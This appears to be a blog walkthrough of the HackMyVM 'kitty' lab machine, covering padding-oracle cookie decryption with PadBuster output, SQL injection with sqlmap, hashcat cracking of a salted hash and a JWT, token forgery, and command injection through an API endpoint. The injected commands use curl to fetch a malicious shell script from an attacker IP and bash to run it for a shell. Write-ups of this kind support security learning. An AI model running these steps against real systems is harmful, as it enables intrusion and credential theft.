当前位置:网站首页>hackmyvm: kitty walkthrough
hackmyvm: kitty walkthrough
2022-08-02 03:59:00 【xdeclearn】
hackmyvm: kitty walkthrough
0x01 oracle padding
端口扫描:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp gitea
使用curl访问80端口, 被重定向到http://kitty.hmv.
This website is a static website,通过ffufGet the virtual host name cookie.kitty.hmv.
注册用户test,查看cookie:
使用 oraclepadding.pl 破解该cookie.
* ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (237/256) [Byte 8]
[+] Success: (41/256) [Byte 7]
[+] Success: (219/256) [Byte 6]
[+] Success: (75/256) [Byte 5]
[+] Success: (240/256) [Byte 4]
[+] Success: (143/256) [Byte 3]
[+] Success: (29/256) [Byte 2]
[+] Success: (188/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 29751a62938de522
[+] Intermediate Bytes (HEX): 4ce47715b126d512
[+] Plain Text: user=tes
Use of uninitialized value $plainTextBytes in concatenation (.) or string at ./oraclepadding.pl line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***
[+] Success: (220/256) [Byte 8]
[+] Success: (32/256) [Byte 7]
[+] Success: (119/256) [Byte 6]
[+] Success: (112/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (139/256) [Byte 2]
[+] Success: (171/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 0d11b045b105c246
[+] Intermediate Bytes (HEX): 5d721d65948ae225
[+] Plain Text: t
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=test
[+] Decrypted value (HEX): 757365723D7465737407070707070707
[+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw==
-------------------------------------------------------
将用户名改为 admin,获取新的cookie.
0x02 sql injection
更新cookie后,刷新页面后,appeared on the page last_login.js,在该jsexists in the interfacesql注入.
使用 sqlmap, 获取到用户 gitea’s 密码hash和salt.
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea |
| salt | YXZpam5leWFt |
使用 hashcat破解得到密码:
* ~ hashcat -m 10 -a 0 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt /usr/share/wordlists/rockyou.txt --show
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme
0x03 openapi to shell
使用账户gitea登录host:3000, Got a new subdomain: http://whythisapiissofast.kitty.hmv.
访问 http://whythisapiissofast.kitty.hmv/openapi.json,检查各个api.
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-1,获取到用户nobody.
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-2,Get a private key.
3. 使用nobody获取access token,这是一个jwt.
4. 使用hashcat破解jwt的password.
- 伪造token,将用户
nobody改为admin,is_admin改为1,Add more time out.
6. 通过api /api/v2/secure/{command}执行命令,But there is a filter here
7. 使用curlRemote download malicioussh,通过bashExecute bypass filtering to achieve command execution,成功获取shell.
这里需要将nginx的index改为test.sh.
(1) whythisapiissofast.kitty.hmv/api/v2/secure/curl%20-o%20test.sh%20192.168.85.169%20-wget
(2) whythisapiissofast.kitty.hmv/api/v2/secure/bash%20test.sh%20-wget
0x04 get user flag
homeThere are two users in the directory.
利用步骤3The found private key is passedssh登录用户dyutidhara,成功获取用户flag.
0x05 root提权
Tried some methods and failed,If you have any success, please let me know in the comments,求帮助.
边栏推荐
- PHP8.2 version release administrator and release plan
- QR code generation API interface, which can be directly connected as an A tag
- Shuriken: 1 vulnhub walkthrough
- Thread Pool (Introduction and Use of Thread Pool)
- PHP realizes the automatic reverse search prompt of the search box
- Warzone: 3 (Exogen) vulnhub walkthrough
- Several interesting ways to open PHP: from basic to perverted
- vim编辑模式
- 稳定好用的短连接生成平台,支持API批量生成
- [campo/random-user-agent] Randomly fake your User-Agent
猜你喜欢
![[league/climate]一个功能健全的命令行功能操作库](/img/ce/39114b1c74af649223db97e5b0e29c.png)
随机推荐
Scrapy crawler encounters redirection 301/302 problem solution
IO streams, byte stream and byte stream buffer
hackmyvm: may walkthrough
[symfony/mailer] An elegant and easy-to-use mail library
使用PHPMailer发送邮件
SQL: DDL, DML, DQL, DCL corresponding introduction and demonstration
(2) 顺序结构、对象的布尔值、选择结构、循环结构、列表、字典、元组、集合
Basic use of v-on, parameter passing, modifiers
PHP有哪些框架?
PHP8.2 version release administrator and release plan
Smart Tips for Frida Scripting in Kali Environment
[league/flysystem]一个优雅且支持度非常高的文件操作接口
Solve the problem of uni - app packaged H5 website to download image
hackmyvm-hopper预排
TCP通信程序
12. What is JS
MySql高级 -- 约束
AES加密的各种蛋疼方式方式
Stable and easy-to-use short connection generation platform, supporting API batch generation
4. PHP array and array sorting